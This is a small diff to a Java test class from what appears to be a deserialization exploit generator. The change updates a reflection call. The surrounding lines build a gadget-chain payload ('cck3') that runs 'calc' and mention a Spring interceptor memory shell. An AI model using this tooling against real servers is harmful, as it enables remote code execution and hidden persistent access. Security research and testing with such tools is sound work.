@@ -9,7 +9,7 @@ import java.util.Base64;
 public class Test {
     public static void main(String[] args) throws Exception {
         final Class<? extends ObjectPayload> payloadClass = ObjectPayload.Utils.getPayloadClass("cck3");
-        ObjectPayload payload = payloadClass.newInstance();
+        ObjectPayload payload = payloadClass.getDeclaredConstructor().newInstance();
         Object object = payload.getObject("calc"); //EX-MS-SpringInterceptorMS-gz
 
         secCig rootObj = new secCig();
